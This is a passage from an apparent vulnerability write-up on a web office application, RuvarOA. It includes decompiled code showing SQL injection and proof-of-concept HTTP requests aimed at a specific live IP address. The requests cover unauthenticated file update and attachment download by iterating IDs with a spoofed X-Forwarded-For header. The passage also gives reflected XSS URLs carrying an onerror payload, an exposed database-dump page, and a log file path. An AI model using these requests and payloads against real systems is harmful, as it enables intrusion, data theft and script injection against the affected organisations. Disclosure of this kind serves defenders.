        string text2 = "";
        text2 = ((!Validate.isNullOrSpace(lt_bt_id.Text)) ? ("select sys_baseinfo.sys_baseinfo_id,sys_baseinfo.bi_name,sys_baseinfo_type.bt_name,sys_baseinfo.sys_basetype_id  from sys_baseinfo inner join sys_baseinfo_type on  sys_baseinfo.sys_basetype_id=sys_baseinfo_type.sys_basetype_id where  sys_baseinfo.sys_basetype_id in (" + lt_bt_id.Text + ") order by bi_order asc ") : ("select sys_baseinfo.sys_baseinfo_id,sys_baseinfo.bi_name,sys_baseinfo_type.bt_name,sys_baseinfo.sys_basetype_id  from sys_baseinfo inner join sys_baseinfo_type on  sys_baseinfo.sys_basetype_id=sys_baseinfo_type.sys_basetype_id where  bt_name='" + Common.FixQuote(text) + "' order by bi_order asc "));
        DataView dataView = SqlHelper.QueryView(text2);

The direct use of Request.QueryString["bt_id"] to retrieve a value and then concatenate it into an SQL statement has resulted in an SQL injection vulnerability.

Information Leakage and Unauthorized Access to Sensitive Data

Error messages that reveal the physical path of the website can be a security risk, especially if there are other vulnerabilities present, such as SQL injection. If an attacker can exploit an SQL injection vulnerability to write files to the server, they might be able to "get shell" access, which means gaining unauthorized access to the server's command line interface.

OfficeFileUpdate.aspx

path

WorkFlow/OfficeFileUpdate.aspx

POC

POST /WorkFlow/OfficeFileUpdate.aspx HTTP/1.1
Host: 112.74.79.113:8000
Content-Length: 144
Cache-Control: max-age=0
Origin: http://112.74.79.113:8000
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://112.74.79.113:8000/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close

__VIEWSTATE=%2FwEPDwUKLTUwNDQwMTA1MGRkLNtCIVKbdmdjLp4E6Em829B9XPLlIL9eHNh9igI5cNQ%3D&Button1=%E5%BC%80%E5%A7%8B%E6%9B%B4%E6%96%B0&txt_file_name=
image-20240127215531511

asset_file_search_left.aspx

path

asset/asset_file_search_left.aspx

POC

GET /asset/asset_file_search_left.aspx HTTP/1.1
Host: 112.74.79.113:8000


image

AttachDown.aspx

path

Mobile/LHMail/AttachDown.aspx

POC

GET /Mobile/LHMail/AttachDown.aspx?contentid=1 HTTP/1.1
Host: 112.74.79.113:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1


image-20240127181528231

Iterating over contentid allows for the downloading of corresponding file types. The same issue exists with email_attach_id.

image-20240127181613032

XSS

emailset_outside.aspx

http://112.74.79.113:8000/SysManage/emailset_outside.aspx?PageTitle=%E7%B3%BB%E7%BB%9F%E5%A4%96%E5%8F%91%E9%82%AE%E7%AE%B1%3Cimg/src/onerror=prompt(8)%3E
image-20240127200030168

common_new_top.aspx

http://112.74.79.113:8000/WebUtility/common_new_top.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E
image-20240127203757656

common_show.aspx

http://112.74.79.113:8000/WebUtility/common_show.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E
image-20240127204441516

common_show_top.aspx

http://112.74.79.113:8000/WebUtility/common_show_top.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E
image-20240127204533407

common_deal.aspx

http://112.74.79.113:8000/WebUtility/common_deal.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E

common_deal_top.aspx

http://112.74.79.113:8000/WebUtility/common_deal_top.aspx?template_id=1&template_name=testssss%3Cimg/src/onerror=prompt(8)%3E

wf_work_print.aspx

http://112.74.79.113:8000/WorkFlow/wf_work_print.aspx?AutoPrint=xxxx%27;prompt(8);%2

All of the aforementioned XSS vulnerabilities are caused by the direct output of parameters into the page.

System Design Flaw

dSql.aspx

path

WebUtility/dSql.aspx

POC

GET /WebUtility/dSql.aspx HTTP/1.1
Host: 112.74.79.113:8000


image-20240127211336204

Vulnerability analysis

function btnMake_Click of calss dSql within the DLL file /RuvarOA/bin/WebUtility.dll

using System;
using System.Data;
using System.IO;
using System.Text;
using System.Web.UI;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using Lib;

namespace WebUtility;

public class dSql : Page
{
    protected HtmlForm form1;

    protected Button btnMake;

    protected HtmlInputCheckBox sys_menu;

    protected HtmlInputCheckBox sys_desk_setting;

    protected HtmlInputCheckBox sys_desk_style;

    protected HtmlInputCheckBox sys_property_tree;

    protected HtmlInputCheckBox sys_pagelist_info;

    protected HtmlInputCheckBox sys_pagelist_field;

    protected HtmlInputCheckBox sys_base_field;

    protected HtmlInputCheckBox sys_pageform_info;

    protected HtmlInputCheckBox sys_baseinfo_type;

    protected HtmlInputCheckBox sys_pagelist_search;

    protected HtmlInputCheckBox msg_source;

    protected HtmlInputCheckBox sys_admin_purview;

    protected HtmlInputCheckBox wf_template;

    protected HtmlInputCheckBox wf_template_field;

    protected HtmlInputCheckBox flow_template;

    protected HtmlInputCheckBox flow_field;

    protected void Page_Load(object sender, EventArgs e)
    {
    }

    protected void btnMake_Click(object sender, EventArgs e)
    {
        StringBuilder stringBuilder = new StringBuilder("version:" + DateTime.Now.ToString("yyyyMMdd.hhmm"));
        string text = "";
        string text2 = "";
        string text3 = "\r\n";
        string text4 = "";
        string text5 = ((Page)this).Server.MapPath("/db/" + DateTime.Now.ToString("yyyy-MM-dd"));
        StreamWriter streamWriter = null;
        if (!Directory.Exists(text5))
        {
            Directory.CreateDirectory(text5);
        }
        for (int i = 0; i < ((Control)form1).Controls.Count; i++)
        {
            Control val = ((Control)form1).Controls[i];
            if (val is HtmlInputCheckBox)
            {
                HtmlInputCheckBox val2 = (HtmlInputCheckBox)(object)((val is HtmlInputCheckBox) ? val : null);
                if (val2.Checked)
                {
                    string value = ((HtmlInputControl)val2).Value;
                    stringBuilder.Append(" truncate table " + value + " " + text3);
                    stringBuilder.Append("/* build " + value + " " + DateTime.Now.ToString() + "   */" + text3);
                    string sQLString = "select * from " + value + " ";
                    DataTable dataTable = SqlHelper.QueryTable(sQLString);
                    sQLString = " truncate table " + value + " " + text3;
                    string text6 = sQLString;
                    sQLString = text6 + "/* build " + value + " " + DateTime.Now.ToString() + "   */" + text3;
                    text6 = sQLString;
                    sQLString = text6 + "set IDENTITY_INSERT " + value + " on " + text3;
                    stringBuilder.Append("set IDENTITY_INSERT " + value + " on " + text3);
                    text2 = "";
                    for (int j = 0; j < dataTable.Columns.Count; j++)
                    {
                        text2 = ((!(text2 == "")) ? (text2 + "," + dataTable.Columns[j].ColumnName) : dataTable.Columns[j].ColumnName);
                    }
                    for (int j = 0; j < dataTable.Rows.Count; j++)
                    {
                        text = "if not exists(select * from " + value + " where " + dataTable.Columns[0].ColumnName + "='" + dataTable.Rows[j][dataTable.Columns[0].ColumnName].ToString() + "') ";
                        text6 = text;
                        text = text6 + "insert into " + value + "(" + text2 + ") values (";
                        for (int k = 0; k < dataTable.Columns.Count; k++)
                        {
                            if (k != 0)
                            {
                                text += ",";
                            }
                            text4 = Common.FixQuote(dataTable.Rows[j][dataTable.Columns[k].ColumnName].ToString());
                            if (text4 == "False")
                            {
                                text4 = "0";
                            }
                            if (text4 == "Tree")
                            {
                                text4 = "1";
                            }
                            text = text + "'" + text4 + "'";
                        }
                        text = text + ") " + text3;
                        stringBuilder.Append(text);
                        sQLString += text;
                    }
                    stringBuilder.Append("set IDENTITY_INSERT " + value + " off " + text3);
                    text6 = sQLString;
                    sQLString = text6 + "set IDENTITY_INSERT " + value + " off " + text3;
                    stringBuilder.Append("GO" + text3 + text3);
                    sQLString = sQLString + "GO" + text3 + text3;
                    streamWriter = new StreamWriter(text5 + "\\" + value + ".txt", append: false, Encoding.UTF8);
                    streamWriter.Write(sQLString);
                    streamWriter.Flush();
                    streamWriter.Close();
                    streamWriter.Dispose();
                }
            }
            JS.AlertGoUrl("默认值生成成功!", "/webutility/dSql.aspx");
        }
    }
}

image-20240127211931004

The log file format is year followed by date, such as 20240127. Access link: /logfiles/20240112.txt

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment